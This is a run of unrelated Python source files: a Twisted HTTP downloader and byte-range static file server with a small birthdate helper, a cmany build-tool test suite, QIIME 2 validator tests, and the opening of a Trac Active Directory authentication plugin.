self.deferred.addBoth(self._cancelTimeout, timeoutCall)
return p
def page(self, page):
if self.waiting:
self.waiting = 0
self.deferred.callback((page, self.response_headers))
class HeaderAwareHTTPDownloader(client.HTTPDownloader):
def gotHeaders(self, headers):
self.value = headers
if self.requestedPartial:
contentRange = headers.get("content-range", None)
if not contentRange:
# server doesn't support partial requests, oh well
self.requestedPartial = 0
return
start, end, realLength = http.parseContentRange(contentRange[0])
if start != self.requestedPartial:
# server is acting weirdly
self.requestedPartial = 0
def getPage(url, contextFactory=None, *args, **kwargs):
"""Download a web page as a string.
Download a page. Return a deferred, which will callback with a
page (as a string) or errback with a description of the error.
See HTTPClientFactory to see what extra args can be passed.
"""
scheme, host, port, path = client._parse(url)
factory = HeaderAwareHTTPClientFactory(url, *args, **kwargs)
if scheme == 'https':
from twisted.internet import ssl
if contextFactory is None:
contextFactory = ssl.ClientContextFactory()
reactor.connectSSL(host, port, factory, contextFactory)
else:
reactor.connectTCP(host, port, factory)
return factory.deferred
def downloadPage(url, file, contextFactory=None, *args, **kwargs):
"""Download a web page to a file.
@param file: path to file on filesystem, or file-like object.
See HTTPDownloader to see what extra args can be passed.
"""
scheme, host, port, path = client._parse(url)
factory = HeaderAwareHTTPDownloader(url, file, *args, **kwargs)
factory.noisy = False
if scheme == 'https':
from twisted.internet import ssl
if contextFactory is None:
contextFactory = ssl.ClientContextFactory()
reactor.connectSSL(host, port, factory, contextFactory)
else:
reactor.connectTCP(host, port, factory)
return factory.deferred
class StaticFile(static.File):
""" taken from twisted.web.static and modified
according to the patch by John-Mark Gurney
http://resnet.uoregon.edu/~gurney_j/jmpc/dist/twisted.web.static.patch
"""
def render(self, request):
#print ""
#print "StaticFile", request
#print "StaticFile in", request.received_headers
"""You know what you doing."""
self.restat()
if self.type is None:
self.type, self.encoding = static.getTypeAndEncoding(self.basename(),
self.contentTypes,
self.contentEncodings,
self.defaultType)
if not self.exists():
return self.childNotFound.render(request)
if self.isdir():
return self.redirect(request)
#for content-length
fsize = size = self.getFileSize()
request.setHeader('accept-ranges','bytes')
if self.type:
request.setHeader('content-type', self.type)
if self.encoding:
request.setHeader('content-encoding', self.encoding)
try:
f = self.openForReading()
except IOError, e:
import errno
if e[0] == errno.EACCES:
return error.ForbiddenResource().render(request)
else:
raise
if request.setLastModified(self.getmtime()) is http.CACHED:
return ''
trans = True
range = request.getHeader('range')
#print "StaticFile", range
tsize = size
if range is not None:
# This is a request for partial data...
bytesrange = range.split('=')
assert bytesrange[0] == 'bytes',\
"Syntactically invalid http range header!"
start, end = bytesrange[1].split('-', 1)
if start:
f.seek(int(start))
if end:
end = int(end)
else:
end = size - 1
else:
lastbytes = int(end)
if size < lastbytes:
lastbytes = size
start = size - lastbytes
f.seek(start)
fsize = lastbytes
end = size - 1
size = end + 1
fsize = end - int(start) + 1
# start is the byte offset to begin, and end is the byte offset
# to end.. fsize is size to send, tsize is the real size of
# the file, and size is the byte position to stop sending.
if fsize <= 0:
request.setResponseCode(http.REQUESTED_RANGE_NOT_SATISFIABLE)
fsize = tsize
trans = False
else:
request.setResponseCode(http.PARTIAL_CONTENT)
request.setHeader('content-range',"bytes %s-%s/%s " % (
str(start), str(end), str(tsize)))
#print "StaticFile", start, end, tsize
request.setHeader('content-length', str(fsize))
if request.method == 'HEAD' or trans == False:
# pretend we're a HEAD request, so content-length
# won't be overwritten.
#print "HEAD request"
request.method = 'HEAD'
return ''
#print "StaticFile out", request.headers, request.code
# return data
# size is the byte position to stop sending, not how many bytes to send
static.FileTransfer(f, size, request)
# and make sure the connection doesn't get closed
return server.NOT_DONE_YET
class BufferFile(static.File):
""" taken from twisted.web.static and modified
according to the patch by John-Mark Gurney
http://resnet.uoregon.edu/~gurney_j/jmpc/dist/twisted.web.static.patch
"""
def __init__(self, path, target_size=0, *args):
static.File.__init__(self, path, *args)
self.target_size = target_size
self.upnp_retry = None
def render(self, request):
#print ""
#print "BufferFile", request
# FIXME detect when request is REALLY finished
if request is None or request.finished:
print "No request to render!"
return ''
"""You know what you doing."""
self.restat()
if self.type is None:
self.type, self.encoding = static.getTypeAndEncoding(self.basename(),
self.contentTypes,
self.contentEncodings,
self.defaultType)
if not self.exists():
return self.childNotFound.render(request)
if self.isdir():
return self.redirect(request)
#for content-length
if (self.target_size > 0):
fsize = size = int(self.target_size)
else:
fsize = size = int(self.getFileSize())
#print fsize
if size == int(self.getFileSize()):
request.setHeader('accept-ranges','bytes')
if self.type:
request.setHeader('content-type', self.type)
if self.encoding:
request.setHeader('content-encoding', self.encoding)
try:
f = self.openForReading()
except IOError, e:
import errno
if e[0] == errno.EACCES:
return error.ForbiddenResource().render(request)
else:
raise
if request.setLastModified(self.getmtime()) is http.CACHED:
return ''
trans = True
range = request.getHeader('range')
#print "StaticFile", range
tsize = size
if range is not None:
# This is a request for partial data...
bytesrange = range.split('=')
assert bytesrange[0] == 'bytes',\
"Syntactically invalid http range header!"
start, end = bytesrange[1].split('-', 1)
if start:
start = int(start)
# Are we requesting something beyond the current size of the file?
if (start >= self.getFileSize()):
# Retry later!
print bytesrange
print "Requesting data beyond current scope -> postpone rendering!"
self.upnp_retry = reactor.callLater(1.0, self.render, request)
return server.NOT_DONE_YET
f.seek(start)
if end:
#print ":%s" % end
end = int(end)
else:
end = size - 1
else:
lastbytes = int(end)
if size < lastbytes:
lastbytes = size
start = size - lastbytes
f.seek(start)
fsize = lastbytes
end = size - 1
size = end + 1
fsize = end - int(start) + 1
# start is the byte offset to begin, and end is the byte offset
# to end.. fsize is size to send, tsize is the real size of
# the file, and size is the byte position to stop sending.
if fsize <= 0:
request.setResponseCode(http.REQUESTED_RANGE_NOT_SATISFIABLE)
fsize = tsize
trans = False
else:
request.setResponseCode(http.PARTIAL_CONTENT)
request.setHeader('content-range',"bytes %s-%s/%s " % (
str(start), str(end), str(tsize)))
#print "StaticFile", start, end, tsize
request.setHeader('content-length', str(fsize))
if request.method == 'HEAD' or trans == False:
# pretend we're a HEAD request, so content-length
# won't be overwritten.
request.method = 'HEAD'
return ''
#print "StaticFile out", request.headers, request.code
# return data
# size is the byte position to stop sending, not how many bytes to send
BufferFileTransfer(f, size - f.tell(), request)
# and make sure the connection doesn't get closed
return server.NOT_DONE_YET
class BufferFileTransfer(object):
"""
A class to represent the transfer of a file over the network.
"""
request = None
def __init__(self, file, size, request):
self.file = file
self.size = size
self.request = request
self.written = self.file.tell()
request.registerProducer(self, 0)
def resumeProducing(self):
#print "resumeProducing", self.request,self.size,self.written
if not self.request:
return
data = self.file.read(min(abstract.FileDescriptor.bufferSize, self.size - self.written))
if data:
self.written += len(data)
# this .write will spin the reactor, calling .doWrite and then
# .resumeProducing again, so be prepared for a re-entrant call
self.request.write(data)
if self.request and self.file.tell() == self.size:
self.request.unregisterProducer()
self.request.finish()
self.request = None
def pauseProducing(self):
pass
def stopProducing(self):
#print "stopProducing",self.request
self.request.unregisterProducer()
self.file.close()
self.request.finish()
self.request = None
from datetime import datetime, tzinfo, timedelta
import random
class CET(tzinfo):
def __init__(self):
self.__offset = timedelta(minutes=60)
self.__name = 'CET'
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self,dt):
return timedelta(0)
class CEST(tzinfo):
def __init__(self):
self.__offset = timedelta(minutes=120)
self.__name = 'CEST'
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self,dt):
return timedelta(0)
bdates = [ datetime(1997,2,28,17,20,tzinfo=CET()), # Sebastian Oliver
datetime(1999,9,19,4,12,tzinfo=CEST()), # Patrick Niklas
datetime(2000,9,23,4,8,tzinfo=CEST()), # Saskia Alexa
datetime(2003,7,23,1,18,tzinfo=CEST()), # Mara Sophie
# you are the best!
]
def datefaker():
return random.choice(bdates)
|
|
#!/usr/bin/env python3
import unittest as ut
import subtest_fix
import os
import sys
import glob
import argparse
import copy
import tempfile
from itertools import combinations
# make the in-repo sources importable before importing c4.cmany
srcdir = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'src')
sys.path.insert(0, srcdir)
import c4.cmany as cmany
import c4.cmany.util as util
import c4.cmany.main as main
import c4.cmany.cmake as cmake
from multiprocessing import cpu_count as cpu_count
maincmd = [sys.executable, '-m', 'c4.cmany.main', '--show-args']
projdir = os.path.dirname(__file__)
compiler_set = os.environ.get('CMANY_TEST_COMPILERS', None)
build_types = os.environ.get('CMANY_TEST_BUILDTYPES', 'Debug,Release')
test_projs = os.environ.get('CMANY_TEST_PROJS', 'hello,libhello')
proj_targets = {
'hello': {
'lib': [],
'exe': ['hello'],
},
'libhello': {
'lib': ['hello', 'hello_static'],
'exe': ['test_hello', 'test_hello_static'],
},
}
flag_bundle_set = {
'none': {
'spec': 'none',
'expected': {
'none': {'vars': [], 'defines': [], 'cxxflags': [], 'flags': [], },
},
},
'foo': {
'spec': '\'foo: -V FOO_VAR=1 -D FOO_DEF=1 -X "wall" -C "wall"\'',
'expected': {
'foo': {'vars': ['FOO_VAR=1'], 'defines': ['FOO_DEF=1'], 'cxxflags': ['wall'], 'flags': ['wall'], },
},
},
'bar': {
'spec': '\'bar: -V BAR_VAR=1 -D BAR_DEF=1 -X "g3" -C "g3"\'',
'expected': {
'bar': {'vars': ['BAR_VAR=1'], 'defines': ['BAR_DEF=1'], 'cxxflags': ['g3'], 'flags': ['g3'], },
},
},
}
variant_set = [flag_bundle_set[v]['spec'] for v in ('none', 'foo', 'bar')]
variant_tests = {
'variant_test00-null':[],
'variant_test01-none_explicit':['none'],
'variant_test10-foo_only':['foo'],
'variant_test11-none_foo':['none', 'foo'],
'variant_test20-bar_only':['bar'],
'variant_test21-none_bar':['none', 'bar'],
'variant_test30-foobar_only':['foo', 'bar'],
'variant_test31-foobar_only':['none', 'foo', 'bar'],
}
def _get_variant_spec(test_name):
blueprint = variant_tests[test_name]
if not blueprint:
return []
li = ['-v'] + [','.join([flag_bundle_set[v]['spec'] for v in blueprint])]
variants = cmany.Variant.create_variants(li)
return li, variants
# unset environment variables which affect the behaviour of child invocations
# of cmany
os.environ['CMANY_ARGS'] = ''
os.environ['CMANY_PFX_ARGS'] = ''
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class CMakeTestProj:
def __init__(self, proj):
self.proj = proj
self.root = util.chkf(projdir, proj)
if proj_targets.get(proj) is None:
raise Exception("no target info for project " + proj)
self.libs = proj_targets[proj]['lib']
self.exes = proj_targets[proj]['exe']
self.targets = self.libs + self.exes
self.multi_target = (len(self.targets) > 1)
# http://stackoverflow.com/questions/17176887/python-get-all-permutation-of-a-list-w-o-repetitions
self.target_combinations = []
for i in range(1, len(self.targets) + 1):
self.target_combinations += list(combinations(self.targets, i))
def run(self, args_, custom_root=None):
args = copy.deepcopy(args_)
root = self.root
if custom_root is not None:
with util.setcwd(self.root):
root = os.path.abspath(custom_root)
if not os.path.exists(root):
os.makedirs(root)
projdir = os.path.abspath('.')
args.append(projdir)
args = maincmd + args
with util.setcwd(root):
tmpfile, tmpname = tempfile.mkstemp(prefix="_cmany_tmp.out.")
with util.stdout_redirected(tmpfile):
#print("----->run():", self.proj, "at", os.getcwd(), " ".join(args))
util.runsyscmd(args)
#print("----->finished run():", self.proj, "at", os.getcwd(), " ".join(args))
# close the mkstemp handle
outsock = os.fdopen(tmpfile, "r")
outsock.close()
# read the captured output
with open(tmpname, "r") as fh:
output = fh.read()
# remove the tmpfile
os.remove(tmpname)
#print("\n"*2, self.root, args[4:], "output len=", len(output), output[:min(len(output), 256)]+".................\n\n")
return output
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# prepare inputs
test_projs = util.splitesc(test_projs, ',')
projs = [CMakeTestProj(p) for p in test_projs]
if compiler_set is None:
compiler_set = [cmany.Compiler.default()]
else:
compiler_set = [cmany.Compiler(c) for c in util.splitesc(compiler_set, ',')]
build_types = [cmany.BuildType(b) for b in util.splitesc(build_types, ',')]
variant_set = cmany.Variant.create_variants(variant_set)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def run_projs(testobj, args, check_fn=None):
numbuilds = len(compiler_set) * len(build_types) * len(variant_set)
#
# run with default parameters
bd = '.test/0--default--build'
id = '.test/0--default--install'
for p in projs:
with testobj.subTest(msg="default parameters", proj=p.proj):
p.run(args + ['--build-dir', bd, '--install-dir', id])
if check_fn:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=cmany.Compiler.default(),
build_type=cmany.BuildType.default(),
variant=cmany.Variant.default(),
numbuilds=1)
check_fn(tb)
#
# run with default parameters in a non root dir
rd = '.test/1--non_root_dir'
for p in projs:
with testobj.subTest(msg="run in a non root dir", proj=p.proj):
p.run(args, custom_root=rd)
if check_fn:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=cmany.Compiler.default(),
build_type=cmany.BuildType.default(),
variant=cmany.Variant.default(),
numbuilds=1)
check_fn(tb)
#
if numbuilds == 1:
return
#
# run all sys,arch,compiler,buildtype,variant combinations at once
bd = '.test/2.1--comps{}--types{}--variants{}--build'.format(len(compiler_set), len(build_types), len(variant_set))
id = '.test/2.1--comps{}--types{}--variants{}--install'.format(len(compiler_set), len(build_types), len(variant_set))
for p in projs:
with testobj.subTest(msg="run all combinations at once", proj=p.proj):
p.run(args + ['--build-dir', bd,
'--install-dir', id,
'-c', ','.join([c.name if c.is_msvc else c.path for c in compiler_set]),
'-t', ','.join([str(b) for b in build_types]),
'-v', ','.join([v.full_specs for v in variant_set])
])
if check_fn:
for c in compiler_set:
for t in build_types:
for v in variant_set:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=c, build_type=t, variant=v,
numbuilds=numbuilds)
check_fn(tb)
#
# run all sys,arch,compiler,buildtype,variant combinations at once - envargs
bd = '.test/2.2--comps{}--types{}--variants{}--build'.format(len(compiler_set), len(build_types), len(variant_set))
id = '.test/2.2--comps{}--types{}--variants{}--install'.format(len(compiler_set), len(build_types), len(variant_set))
for p in projs:
with testobj.subTest(msg="run all combinations at once", proj=p.proj):
os.environ['CMANY_ARGS'] = '-c {} -t {} -v {}'.format(
','.join([c.name if c.is_msvc else c.path for c in compiler_set]),
','.join([str(b) for b in build_types]),
','.join([v.full_specs for v in variant_set])
)
#util.logwarn('export CMANY_ARGS={}'.format(os.environ['CMANY_ARGS']))
p.run(args + ['--build-dir', bd,
'--install-dir', id,
])
os.environ['CMANY_ARGS'] = ''
if check_fn:
for c in compiler_set:
for t in build_types:
for v in variant_set:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=c, build_type=t, variant=v,
numbuilds=numbuilds)
check_fn(tb)
#
# run sys,arch,compiler,buildtype combinations individually
for p in projs:
for c in compiler_set:
for t in build_types:
for v in variant_set:
with testobj.subTest(msg="run all combinations individually",
proj=p.proj, compiler=c, build_type=t, variant=v):
bd = '.test/3.1--{}--{}--{}--build'.format(c, t, v.name)
id = '.test/3.1--{}--{}--{}--install'.format(c, t, v.name)
p.run(args + ['--build-dir', bd,
'--install-dir', id,
'-c', c.name if c.is_msvc else c.path,
'-t', str(t),
'-v', v.full_specs,
])
if check_fn:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=c, build_type=t, variant=v,
numbuilds=1)
check_fn(tb)
#
# run sys,arch,compiler,buildtype combinations individually - envargs
for p in projs:
for c in compiler_set:
for t in build_types:
for v in variant_set:
with testobj.subTest(msg="run all combinations individually - envargs",
proj=p.proj, compiler=c, build_type=t, variant=v):
bd = '.test/3.2--envargs--{}--{}--{}--build'.format(c, t, v.name)
id = '.test/3.2--envargs--{}--{}--{}--install'.format(c, t, v.name)
os.environ['CMANY_ARGS'] = '-c {} -t {} -v {}'.format(
c.name if c.is_msvc else c.path,
str(t),
v.full_specs)
#util.logwarn('export CMANY_ARGS={}'.format(os.environ['CMANY_ARGS']))
p.run(args + ['--build-dir', bd, '--install-dir', id])
os.environ['CMANY_ARGS'] = ''
if check_fn:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=c, build_type=t, variant=v,
numbuilds=1)
check_fn(tb)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class TestBuild:
def __init__(self, proj, buildroot, installroot, compiler, build_type, variant, numbuilds):
self.proj = proj
self.buildroot = buildroot
self.installroot = installroot
self.compiler = compiler
self.build_type = build_type
self.variant = variant
self.numbuilds = numbuilds
self.flags = cmany.BuildFlags('all_builds')
self.build_obj = cmany.Build(proj_root=self.proj.root,
build_root=os.path.join(self.proj.root, self.buildroot),
install_root=os.path.join(self.proj.root, self.installroot),
system=cmany.System.default(),
arch=cmany.Architecture.default(),
build_type=build_type,
compiler=compiler,
variant=variant,
flags=self.flags,
num_jobs=cpu_count(),
kwargs={}
)
def checkc(self, tester):
tester.assertEqual(self.nsiblings(self.buildroot), self.numbuilds, msg=self.buildroot + str(self.siblings(self.buildroot)))
build_type = cmake.getcachevar(self.build_obj.builddir, 'CMAKE_BUILD_TYPE')
tester.assertEqual(build_type, str(self.build_type))
def checkv(self, tester):
pass
def checkb(self, tester):
self.checkc(tester)
def checki(self, tester):
tester.assertEqual(self.nsiblings(self.installroot), self.numbuilds)
def nsiblings(self, dir):
return len(self.siblings(dir))
def siblings(self, dir):
res = os.path.join(self.proj.root, dir, '*')
ch = glob.glob(res)
return ch
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class Outputs(dict):
"a class to store several outputs which should be the same"
def add_one(self, k, kk, vv):
l = self.get(k)
if l is None:
l = []
self[k] = l
l.append((kk, vv))
def compare_outputs(self, test):
for k, outs in self.items():
rk, rv = outs[0]
rv = self._filter_output(rv)
for kk, vv in outs[1:]:
vv = self._filter_output(vv)
test.assertEqual(rv, vv, "{}: refkey: '{}' vs key '{}'".format(k, rk, kk))
def _filter_output(self, s):
# the first three lines contain the command, so skip them
out = "\n".join(s.split("\n")[3:])
return out
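# Usage sketch for Outputs (hypothetical keys; `test` is a unittest.TestCase):
#
#   outs = Outputs()
#   outs.add_one('-h', '-h', first_output)
#   outs.add_one('-h', '--help', second_output)
#   outs.compare_outputs(test)  # asserts both outputs match after filtering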
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class Test00Help(ut.TestCase):
# TODO: grab the output and compare it to make sure it is the same
def setUp(self):
super().setUp()
self.maxDiff = None
# make sure --show-args is not passed to projs.run()
global maincmd
self.maincmd = maincmd
maincmd = [c for c in maincmd if c != '--show-args']
def tearDown(self):
super().tearDown()
global maincmd
maincmd = self.maincmd
cmany_help = Outputs()
def test00_cmany_help_short(self):
out = projs[0].run(['-h'])
__class__.cmany_help.add_one('-h', '-h', out)
def test01_cmany_help_long(self):
out = projs[0].run(['--help'])
__class__.cmany_help.add_one('-h', '--help', out)
def test0x_cmany_help_compare(self):
__class__.cmany_help.compare_outputs(self)
sc_help_short = Outputs()
def test10_subcommand_help_short(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
out = projs[0].run([c, '-h'])
__class__.sc_help_short.add_one(c, c, out)
def test11_subcommand_help_short_aliases(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
for a in aliases:
out = projs[0].run([a, '-h'])
__class__.sc_help_short.add_one(c, a, out)
def test1x_subcommand_help_compare(self):
__class__.sc_help_short.compare_outputs(self)
sc_help_short_rev = Outputs()
def test20_subcommand_help_short_rev(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
out = projs[0].run(['h', c])
__class__.sc_help_short_rev.add_one(c, c, out)
def test21_subcommand_help_short_rev_aliases(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
for a in aliases:
out = projs[0].run(['h', a])
__class__.sc_help_short_rev.add_one(c, a, out)
def test2x_subcommand_help_compare(self):
__class__.sc_help_short_rev.compare_outputs(self)
sc_help_long = Outputs()
def test30_subcommand_help_long(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
out = projs[0].run([c, '--help'])
__class__.sc_help_long.add_one(c, c, out)
def test31_subcommand_help_long_aliases(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
for a in aliases:
out = projs[0].run([a, '--help'])
__class__.sc_help_long.add_one(c, a, out)
def test3x_subcommand_help_long_compare(self):
__class__.sc_help_long.compare_outputs(self)
sc_help_long_rev = Outputs()
def test40_subcommand_help_long_rev(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
out = projs[0].run(['help', c])
__class__.sc_help_long_rev.add_one(c, c, out)
def test41_subcommand_help_long_rev_aliases(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
for a in aliases:
out = projs[0].run(['help', a])
__class__.sc_help_long_rev.add_one(c, a, out)
def test4x_subcommand_help_long_compare(self):
__class__.sc_help_long_rev.compare_outputs(self)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class Test01Configure(ut.TestCase):
def test00_default(self):
run_projs(self, ['c'], lambda tb: tb.checkc(self))
def test01_custom_dirs(self):
run_projs(self, ['c'], lambda tb: tb.checkc(self))
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class Test02Build(ut.TestCase):
def test00_default(self):
run_projs(self, ['b'], lambda tb: tb.checkb(self))
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class Test03Install(ut.TestCase):
def test00_default(self):
run_projs(self, ['i'], lambda tb: tb.checki(self))
class Test04Dependencies(ut.TestCase):
pass
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
if __name__ == '__main__':
ut.main()
|
|
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2022, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from qiime2.core.exceptions import ValidationError, ImplementationError
import unittest
from qiime2.core.validate import ValidationObject
from qiime2.sdk import PluginManager
from qiime2.plugin.plugin import ValidatorRecord, Plugin
from qiime2.core.testing.type import (IntSequence1, AscIntSequence,
Kennel, Dog, Squid, Octopus)
from qiime2.core.testing.format import IntSequenceFormat, Cephalapod
class TestValidationObject(unittest.TestCase):
def setUp(self):
self.simple_int_seq = IntSequenceFormat()
with self.simple_int_seq.open() as fh:
fh.write('\n'.join(map(str, range(3))))
self.simple_int_seq.validate(level='max')
def test_initialization(self):
validator_object = ValidationObject(IntSequence1)
self.assertEqual(validator_object.concrete_type, IntSequence1)
def test_add_validator(self):
def test_validator_method(data: list, level):
pass
test_record = ValidatorRecord(validator=test_validator_method,
view=list, plugin='this_plugin',
context=IntSequence1)
validator_object = ValidationObject(IntSequence1)
validator_object.add_validator(test_record)
self.assertEqual(validator_object._validators,
[test_record])
def test_add_validation_object(self):
first_VO = ValidationObject(IntSequence1)
second_VO = ValidationObject(IntSequence1)
def first_validator(data: list, level):
pass
def second_validator(data: list, level):
pass
first_record = ValidatorRecord(validator=first_validator,
view=list, plugin='this_plugin',
context=IntSequence1)
second_record = ValidatorRecord(validator=second_validator,
view=list, plugin='this_plugin',
context=IntSequence1)
first_VO.add_validator(first_record)
second_VO.add_validator(second_record)
# Allows us to demonstrate add_validation_object sets _is_sorted to
# false
first_VO._sort_validators()
first_VO.add_validation_object(second_VO)
self.assertEqual(first_VO._validators, [first_record, second_record])
self.assertFalse(first_VO._is_sorted)
def test_catch_different_concrete_types(self):
squid_vo = ValidationObject(Squid)
octopus_vo = ValidationObject(Octopus)
def squid_validator(data: Cephalapod, level):
pass
def octopus_validator(data: Cephalapod, level):
pass
squid_record = ValidatorRecord(validator=squid_validator,
view=Cephalapod,
plugin='ocean_plugin',
context=Squid)
octopus_record = ValidatorRecord(validator=octopus_validator,
view=Cephalapod,
plugin='sea_plugin',
context=Octopus)
squid_vo.add_validator(squid_record)
octopus_vo.add_validator(octopus_record)
with self.assertRaisesRegex(TypeError, "Unable to add"):
squid_vo.add_validation_object(octopus_vo)
def test_public_validators_generation(self):
validator_object = ValidationObject(IntSequence1)
def first_validator(data: list, level):
pass
def second_validator(data: list, level):
pass
first_record = ValidatorRecord(validator=first_validator,
view=list, plugin='this_plugin',
context=IntSequence1)
second_record = ValidatorRecord(validator=second_validator,
view=list, plugin='this_plugin',
context=IntSequence1)
validator_object.add_validator(first_record)
validator_object.add_validator(second_record)
self.assertEqual(validator_object.validators,
[first_record, second_record])
self.assertTrue(validator_object._is_sorted)
def test_run_validators(self):
validator_object = ValidationObject(IntSequence1)
has_run = False
def test_validator_method(data: list, level):
nonlocal has_run
has_run = True
self.assertEqual(data, [0, 1, 2])
self.assertEqual(level, 'max')
test_record = ValidatorRecord(validator=test_validator_method,
view=list, plugin='this_plugin',
context=IntSequence1)
validator_object.add_validator(test_record)
validator_object(self.simple_int_seq, level='max')
self.assertTrue(has_run)
def test_run_validators_validation_exception(self):
validator_object = ValidationObject(AscIntSequence)
def test_raising_validation_exception(data: list, level):
raise ValidationError("2021-08-24")
test_record = ValidatorRecord(
validator=test_raising_validation_exception,
view=list, plugin='this_plugin',
context=AscIntSequence)
validator_object.add_validator(test_record)
with self.assertRaisesRegex(ValidationError,
"2021-08-24"):
validator_object(data=[], level=None)
def test_run_validators_unknown_exception(self):
validator_object = ValidationObject(AscIntSequence)
def test_raising_validation_exception(data: list, level):
raise KeyError("2021-08-24")
test_record = ValidatorRecord(
validator=test_raising_validation_exception,
view=list, plugin='this_plugin',
context=AscIntSequence)
validator_object.add_validator(test_record)
with self.assertRaisesRegex(ImplementationError,
"attempted to validate"):
validator_object(data=[], level=None)
def test_validator_sorts(self):
self.pm = PluginManager()
test_object = self.pm.validators[Squid]
self.assertFalse(test_object._is_sorted)
exp = ['validator_sort_first',
'validator_sort_middle',
'validator_sort_middle_b',
'validator_sort_last']
exp2 = ['validator_sort_first',
'validator_sort_middle_b',
'validator_sort_middle',
'validator_sort_last']
obs = [record.validator.__name__ for record in test_object.validators]
self.assertIn(obs, [exp, exp2])
self.assertTrue(test_object._is_sorted)
class TestValidatorIntegration(unittest.TestCase):
def setUp(self):
# setup test plugin
self.test_plugin = Plugin(name='validator_test_plugin',
version='0.0.1',
website='test.com',
package='qiime2.core.tests',
project_name='validator_test')
self.pm = PluginManager()
# setup test data
self.simple_int_seq = IntSequenceFormat()
with self.simple_int_seq.open() as fh:
fh.write('\n'.join(map(str, range(3))))
self.simple_int_seq.validate(level='max')
def tearDown(self):
        # This is a dead-man's switch: it verifies the test_plugin was
        # actually added to the PluginManager before forgetting the singleton
self.assertIn(self.test_plugin.name, self.pm.plugins)
self.pm.forget_singleton()
def test_validator_from_each_type_in_expression(self):
@self.test_plugin.register_validator(IntSequence1 | AscIntSequence)
def blank_validator(data: list, level):
pass
self.pm.add_plugin(self.test_plugin)
def test_no_transformer_available(self):
@self.test_plugin.register_validator(IntSequence1 | Kennel[Dog])
def blank_validator(data: list, level):
pass
with self.assertRaisesRegex(
AssertionError,
r"Kennel\[Dog\].*blank_validator.*transform.*builtins:list"):
self.pm.add_plugin(self.test_plugin)
class TestValidatorRegistration(unittest.TestCase):
def setUp(self):
self.test_plugin = Plugin(name='validator_test_plugin',
version='0.0.1',
website='test.com',
package='qiime2.core.tests',
project_name='validator_test')
def test_catch_missing_validator_arg(self):
run_checker = False
with self.assertRaisesRegex(TypeError, "does not contain the"
" required arguments"):
run_checker = True
@self.test_plugin.register_validator(IntSequence1)
def validator_missing_level(data: list):
pass
assert run_checker
def test_catch_extra_validator_arg(self):
run_checker = False
with self.assertRaisesRegex(TypeError, "does not contain the"
" required arguments"):
run_checker = True
@self.test_plugin.register_validator(IntSequence1)
def validator_extra_arg(data: list, level, spleen):
pass
assert run_checker
def test_catch_no_data_annotation_in_validator(self):
run_checker = False
with self.assertRaisesRegex(TypeError, "No expected view type"
" provided as annotation for `data`"
" variable"):
run_checker = True
@self.test_plugin.register_validator(IntSequence1)
def validator_no_view_annotation(data, level):
pass
assert run_checker
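
# For contrast with the failure cases above, a minimal well-formed validator
# sketch that passes all of the registration checks takes exactly `data` and
# `level`, and annotates `data` with the expected view type:
#
#     @test_plugin.register_validator(IntSequence1)
#     def blank_validator(data: list, level):
#         pass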
|
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 John Hampton <pacopablo@pacopablo.com>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# Author: John Hampton <pacopablo@pacopablo.com>
from trac.core import *
from trac.config import Option
import ldap
import time
from acct_mgr.api import IPasswordStore
from tracext.adauth.api import IPermissionUserProvider
__all__ = ['ADAuthStore']
class ADAuthStore(Component):
"""AD Password Store for Account Manager """
implements(IPasswordStore, IPermissionUserProvider)
ads = Option('account-manager', 'ad_server', 'localhost', 'Address of the Active Directory Server')
base_dn = Option('account-manager', 'base_dn', None, 'Base DN used for account searches')
bind_dn = Option('account-manager', 'bind_dn', None, 'DN used to bind to Active Directory')
bind_pw = Option('account-manager', 'bind_passwd', None, 'Password used when binding to Active Directory')
auth_group = Option('account-manager', 'auth_group', None, 'DN of group containing valid users. If None, any AD user is valid')
admin_group = Option('account-manager', 'admin_group', None, 'DN of group containing TRAC_ADMIN users')
customcacert = Option('account-manager', 'custom_cacertfile', None, 'Path of custom CACERTFILE for ldaps')
ignoreunknowncertificate = False
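
    # Illustrative trac.ini excerpt wiring up the options above (all values
    # are hypothetical examples, not defaults):
    #
    #   [account-manager]
    #   ad_server = ldaps://dc01.example.com
    #   base_dn = DC=example,DC=com
    #   bind_dn = CN=trac,OU=Service Accounts,DC=example,DC=com
    #   bind_passwd = secret
    #   auth_group = CN=Trac Users,OU=Groups,DC=example,DC=com
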